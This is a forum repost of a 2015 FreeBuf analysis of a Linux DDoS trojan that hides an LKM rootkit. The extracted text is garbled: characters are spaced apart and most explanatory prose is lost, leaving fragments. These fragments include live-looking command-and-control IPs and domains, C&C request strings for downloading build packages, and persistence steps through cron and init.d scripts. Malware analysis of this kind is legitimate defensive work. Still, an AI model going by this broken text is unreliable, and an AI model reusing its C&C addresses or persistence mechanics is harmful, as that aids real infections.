搜索

[8803] 2015-03-30_一款隐藏嵌入式Rookit的DDoS木马分析

文档创建者:s7ckTeam
浏览次数:32
最后更新:2025-01-17
2015-03-30_一款隐藏嵌入式Rookit的DDoS木马分析 R o o k i t D D o S F r e e B u f   2 0 1 5 - 0 3 - 3 0 f r e e b u f 2 0 1 5 @ P E T E R   K Á L N A I   A V A S T b l o g & d o u b i S S H r o o t r o o t s h e l l m a i n ,   c h e c k ,   c o m p i l e r ,   u n c o m p r e s s ,   s e t u p ,   g e n e r a t e ,   u p l o a d , c h e c k b u i l d   _ _ h o s t _ 3 2 _ _ ,   _ _ h o s t _ 6 4 _ _ ,   _ _ k e r n e l _ _ ,   _ _ r e m o t e _ _ C & C i i d M D 5 l s m o d v e r m a g i c 3 . 8 . 0 - 1 9 - g e n e r i c   S M P   m o d _ u n l o a d   m o d v e r s i o n s   6 8 6   M D 5 C E 7 4 B F 6 2 A C F E 9 4 4 B 2 1 6 7 2 4 8 D D 0 6 7 4 9 7 7 G E T C & C r e q u e s t : G E T   / c h e c k ? i i d = C E 7 4 B F 6 2 A C F E 9 4 4 B 2 1 6 7 2 4 8 D D 0 6 7 4 9 7 7 & k e r n e l = 3 . 8 . 0 r e p l y : 1 0 0 1 | C E 7 4 B F 6 2 A C F E 9 4 4 B 2 1 6 7 2 4 8 D D 0 6 7 4 9 7 7 | h e a d e r   d i r e c t o r y   i s   e x i s t s ! c o m p i l e r G E T : C & C r e q u e s t : G E T   / c o m p i l e r ? i i d = C E 7 4 B F 6 2 A C F E 9 4 4 B 2 1 6 7 2 4 8 D D 0 6 7 4 9 7 7 & u s e r n a m e = a d m i n & p a s s w o r d = a d m i n & i p = 1 0 3 . 2 5 . 9 . 2 4 5 : 8 0 0 5 % 7 C 1 0 3 . 2 4 0 . 1 4 1 . 5 0 : 8 0 0 5 % 7 C 6 6 . 1 0 2 . 2 5 3 . 3 0 : 8 0 0 5 % 7 C n d n s . d s a j 2 a 1 . o r g : 8 0 0 5 % 7 C n d n s . d s a j 2 a . o r g : 8 0 0 5 % 7 C n d n s . h c x i a o a o . c o m : 8 0 0 5 % 7 C n d n s . d s a j 2 a . c o m : 8 0 0 5
& v e r = 3 . 8 . 0 - 1 9 - g e n e r i c % 5 C % 2 0 S M P % 5 C % 2 0 m o d _ u n l o a d % 5 C % 2 0 m o d v e r s i o n s % 5 C % 2 0 6 8 6 % 5 C % 2 0 & k e r n e l = 3 . 8 . 0 r e p l y : 1 0 0 1 | C E 7 4 B F 6 2 A C F E 9 4 4 B 2 1 6 7 2 4 8 D D 0 6 7 4 9 7 7 | h e a d e r   d i r e c t o r y   i s   e x i s t s ! G E T r e q u e s t : G E T   / u p l o a d / m o d u l e / C E 7 4 B F 6 2 A C F E 9 4 4 B 2 1 6 7 2 4 8 D D 0 6 7 4 9 7 7 / b u i l d . t g z r e p l y : 1 0 0 1 | C E 7 4 B F 6 2 A C F E 9 4 4 B 2 1 6 7 2 4 8 D D 0 6 7 4 9 7 7 | c r e a t e   o k / l i b / m o d u l e s / % s / b u i l d / s % u n a m e C & C m i n i C & C r o o t k i t L K M v e r m a g i c r o o t k i t / b o o t / 1 0 / e t c / i n i t . d /   / e t c / r c % u . d / S 9 0 % s u % 1 - 5 s % / e t c / c r o n . h o u r l y / c r o n . s h # ! / b i n / s h P A T H = / b i n : / s b i n : / u s r / b i n : / u s r / s b i n : / u s r / l o c a l / b i n : / u s r / l o c a l / s b i n : / u s r / X 1 1 R 6 / b i n f o r   i   i n   ` c a t   / p r o c / n e t / d e v | g r e p   : | a w k   - F :   { , 2 7 h , p r i n t   $ 1 , 2 7 h , } ` ;   d o   i f c o n f i g   $ i   u p &   d o n e c p   / l i b / u d e v / u d e v   / l i b / u d e v / d e b u g / l i b / u d e v / d e b u g
c r o n t a b * / 3   *   *   *   *   r o o t   / e t c / c r o n . h o u r l y / c r o n . s h 1 2 / l i b / u d e v / u d e v 3 m d 5 d e n y i p f i l e n a m e r m f i l e m d 5 C R C i p f i l e n a m e r m f i l e A R M 3 2 6 4 L i n u x   W e b * n i x d a e m o n d o w n 3 2 / l i b / l i b g c c 4 . s o / v a r / r u n / u d e v . p i d   / e t c / c r o n . h o u r l y / u d e v . s h r o o t k i t I o C L K M   R o o t k i t W i n d o w s 使 r o o t k i t 2 0 0 6 B o t c o n f   2 0 1 4
D D o S   r s _ d e v r o o t k i t i o c t l r o o t k i t T C P 3 S u t e r u s u h t t p s : / / g i t h u b . c o m / m n c o p p o l a / s u t e r u s u   L i n u x   2 . 6 / 3 . x   o n   x 8 6 ( _ 6 4 ) ,   a n d   A R M L K M   r o o t k i t h t t p : / / p o p p o p r e t . o r g / 2 0 1 3 / 0 1 / 0 7 / s u t e r u s u - r o o t k i t - i n l i n e - k e r n e l - f u n c t i o n - h o o k i n g - o n - x 8 6 - a n d - a r m / C & C 使 X O R B B 2 F A 3 6 A A A 9 5 4 1 F 0 / v a r / r u n / s f t p . p i d 3 2 C & C
m d 5 s h e l l C & C _ _ r e m o t e _ _ C & C 0 x 1 C H e a d e r 0 x 1 0 2 C 0 x 3 _ c m d _ s t a r t 0 x F I P 绿 S Y N / D N S a v a s t   F r e e B u f / x i a 0 k   F r e e B u f . C O M

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理